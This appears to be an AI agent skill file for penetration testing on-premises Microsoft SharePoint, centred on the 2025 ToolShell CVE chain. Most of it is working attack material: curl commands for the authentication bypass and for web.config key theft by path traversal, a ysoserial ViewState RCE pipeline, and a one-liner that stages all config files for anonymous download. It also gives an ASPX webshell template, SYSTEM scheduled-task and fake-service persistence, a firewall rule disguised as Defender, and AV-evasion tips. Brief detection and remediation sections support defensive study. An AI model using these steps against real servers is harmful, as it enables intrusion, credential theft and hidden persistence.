OpenSkillIndex← back to search

Hacktricks-skills sharepoint-pentest

How to enumerate, exploit, and post-exploit Microsoft SharePoint environments. Use this skill whenever the user mentions SharePoint, IIS, ASP.NET web applications, ViewState exploitation, or needs to assess SharePoint security. Make sure to use this skill for any SharePoint-related security assessment, vulnerability testing, or incident response involving SharePoint servers, even if they don't explicitly mention 'SharePoint' but describe IIS/ASP.NET environments with _layouts or _vti_bin paths.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-web/microsoft-sharepoint/SKILL.MD
source content

SharePoint Pentesting & Exploitation

⚠️ AUTHORIZED USE ONLY - This skill is for authorized security assessments, penetration testing, and incident response. Always have written authorization before testing any system.

This skill covers practical techniques to enumerate, exploit, and post-exploit Microsoft SharePoint (on-premises) environments. SharePoint is built on ASP.NET/IIS, so classic web attack surfaces apply, plus hundreds of proprietary endpoints that dramatically expand the attack surface.

Quick Start

# 1. Enumerate the target
./scripts/sharepoint-enumerate.sh <target-host>

# 2. If vulnerable, generate exploit payloads
python3 scripts/sharepoint-viewstate-forgery.py --help

# 3. Extract configuration files post-exploitation
./scripts/sharepoint-config-extractor.sh <target-path>

1. Enumeration

1.1 Identify SharePoint

Check for SharePoint-specific indicators:

# Favicon hash and keywords
curl -s https://<host>/_layouts/15/images/SharePointHome.png
curl -s https://<host>/_vti_bin/client.svc | file -  # Returns WCF/XSI

# Version leakage (often in JavaScript)
curl -s https://<host>/_layouts/15/init.js | grep -i "spPageContextInfo"

# Check for vulnerable ToolPane endpoint
curl -s -I https://<host>/_layouts/15/ToolPane.aspx

1.2 Enumerate Standard Paths

# Interesting standard paths to check
/_layouts/15/ToolPane.aspx               # Vulnerable page in 2025 exploit chain
/_vti_bin/Lists.asmx                     # Legacy SOAP service
/_catalogs/masterpage/Forms/AllItems.aspx
/_vti_bin/owssvr.dll
/_vti_bin/soap.dll

1.3 Enumerate Sites & Site Collections

# Requires at least Anonymous access
python3 Office365-ADFSBrute/SharePointURLBrute.py -u https://<host>

2. The 2025 Exploit Chain (ToolShell)

2.1 CVE-2025-49704 – Code Injection on ToolPane.aspx

/_layouts/15/ToolPane.aspx?PageView=…&DefaultWebPartId=<payload>
allows arbitrary Server-Side Include code injection that gets compiled by ASP.NET.

Attack pattern:

  1. Inject C# code via 
    DefaultWebPartId
    parameter
  2. Code executes 
    Process.Start()
    and drops malicious ViewState
  3. Leads to server-side code execution

2.2 CVE-2025-49706 – Authentication Bypass

The same page trusts the X-Forms_BaseUrl header to determine site context. By pointing it to 

/_layouts/15/
, MFA/SSO enforced at the root site can be bypassed unauthenticated.

Bypass technique:

curl -X POST https://<host>/_layouts/15/ToolPane.aspx \
  -H "X-Forms_BaseUrl: https://<host>/_layouts/15/" \
  -H "Referer: https://<host>/_layouts/15/" \
  -d "<payload>"

2.3 CVE-2025-53770 – ViewState Deserialization → RCE

Once you control a gadget in 

ToolPane.aspx
, post an unsigned (or MAC-only) 
__VIEWSTATE
value that triggers .NET deserialization inside 
w3wp.exe
.

If signing is enabled:

  1. Steal ValidationKey/DecryptionKey from web.config (see 2.4)
  2. Forge payload with ysoserial.net or ysodom
# Generate ViewState payload
ysoserial.exe -g TypeConfuseDelegate -f Json.Net -o raw -c "cmd /c whoami" | \
  ViewStateGenerator.exe --validation-key <hex> --decryption-key <hex> -o payload.txt

2.4 CVE-2025-53771 – Path Traversal / web.config Disclosure

Send a crafted 

Source
parameter to 
ToolPane.aspx
to return targeted files:

# Extract web.config
curl "https://<host>/_layouts/15/ToolPane.aspx?Source=../../../../web.config"

# Extract other config files
curl "https://<host>/_layouts/15/ToolPane.aspx?Source=../../../../ApplicationHost.config"

What you get:

  • <machineKey validationKey="…" decryptionKey="…">
    → forge ViewState/ASPXAUTH cookies
  • Connection strings & secrets
  • Application configuration

2.5 ToolShell Workflow (Observed in Ink Dragon Intrusions)

  1. Header spoofing for auth bypass - POST to 
    /_layouts/15/ToolPane.aspx
    with fake 
    X-Forms_BaseUrl
    and 
    Referer
    headers
  2. Serialized gadget in same request - Body includes attacker-controlled ViewState/ToolPart data
  3. Internet-scale scanning - Enumerate every reachable 
    ToolPane.aspx
    endpoint
  4. Immediate staging - Drop loader or PowerShell stager that:
    • Dumps every web.config
    • Plants ASPX webshell for contingency access
    • Schedules local Potato privesc to escape IIS worker

3. Post-Exploitation

3.1 Exfiltrate All Config Files

# Variation 1: Batch extract all .config files
cmd.exe /c for /R C:\inetpub\wwwroot %i in (*.config) do @type "%i" >> "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\debug_dev.js"

The resulting 

debug_dev.js
can be downloaded anonymously and contains all sensitive configuration.

3.2 Deploy ASPX Web Shell

# Variation 2: Base64-encoded deployment
powershell.exe -EncodedCommand <base64>

Shell template:

<%@ Page Language="C#" %>
<%@ Import Namespace="System.Security.Cryptography" %>
<script runat="server">
    protected void Page_Load(object sender, EventArgs e){
        Response.Write(MachineKey.ValidationKey);
        // echo secrets or invoke cmd
    }
</script>

Write location:

C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

3.3 Decrypt Protected Configuration

Once on the web tier, decrypt protected sections:

# Decrypt connectionStrings
aspnet_regiis.exe -px "connectionStrings" C:\temp\conn.xml -pri

# Decrypt appSettings
aspnet_regiis.exe -px "appSettings" C:\temp\settings.xml -pri

This reveals SQL logins, SMTP relays, and custom service credentials.

3.4 Lateral Movement Patterns

  1. Recycle app-pool accounts - Many enterprises reuse 
    IIS APPPOOL\SharePoint
    across farms
  2. Test credentials - Use decrypted credentials over SMB/RDP/WinRM to sibling servers
  3. Abuse leaked machineKey values - Reusing validationKey/decryptionKey allows lateral ViewState exploitation between internal SharePoint zones

3.5 Persistence Patterns

Scheduled tasks:

# One-shot task (often missed by telemetry)
schtasks /create /tn "SYSCHECK" /ru SYSTEM /sc once /st <hh:mm> /tr "<payload>"

Masqueraded services:

# Services like WindowsTempUpdate, WaaSMaintainer
sc create "WindowsTempUpdate" binPath="<malicious-path>" start=auto

Firewall downgrades:

# Permissive outbound rule masquerading as Defender
netsh advfirewall firewall add rule name="Microsoft MsMpEng" dir=out action=allow program="C:\ProgramData\Microsoft\Windows Defender\MsMpEng.exe" enable=yes profile=any

4. Detection & Evasion

4.1 What Defenders See

  • Header anomalies - Unusual 
    X-Forms_BaseUrl
    values
  • ViewState patterns - Unusually large or malformed ViewState parameters
  • File access - Access to 
    web.config
    via 
    ToolPane.aspx
  • Process spawning - 
    w3wp.exe
    spawning 
    cmd.exe
    or 
    powershell.exe
  • Network - DNS TXT record queries (AK47C2 variant), unusual outbound connections

4.2 Evasion Techniques

  • Obfuscation - Single-letter variable names, 
    Thread.Sleep()
    for timing-based AV bypass
  • DLL side-loading - Place malicious DLL next to legitimate executables (e.g., 
    7z.exe
    )
  • Masquerading - Use legitimate Windows component names for services and firewall rules
  • Chunked communication - Split long queries across multiple requests

5. Remediation

5.1 Immediate Actions

  1. Patch immediately - Apply Microsoft security updates for CVE-2025-49704/49706/53770/53771
  2. Rotate machineKey - Change validationKey/decryptionKey in web.config
  3. Audit app-pool accounts - Ensure unique credentials per server
  4. Review scheduled tasks - Check for persistence mechanisms
  5. Scan for webshells - Look for suspicious .aspx files in _layouts directories

5.2 Long-term Hardening

  1. Disable anonymous access - Where possible
  2. Implement WAF rules - Block suspicious ViewState patterns
  3. Monitor _layouts endpoints - Alert on unusual access patterns
  4. Segment SharePoint - Limit lateral movement opportunities
  5. Regular credential rotation - Especially for app-pool accounts

6. References

7. Related Skills

  • IIS post-exploitation & web.config abuse
  • ASP.NET ViewState exploitation
  • .NET deserialization attacks
  • Windows privilege escalation (Potato variants)
  • DLL side-loading techniques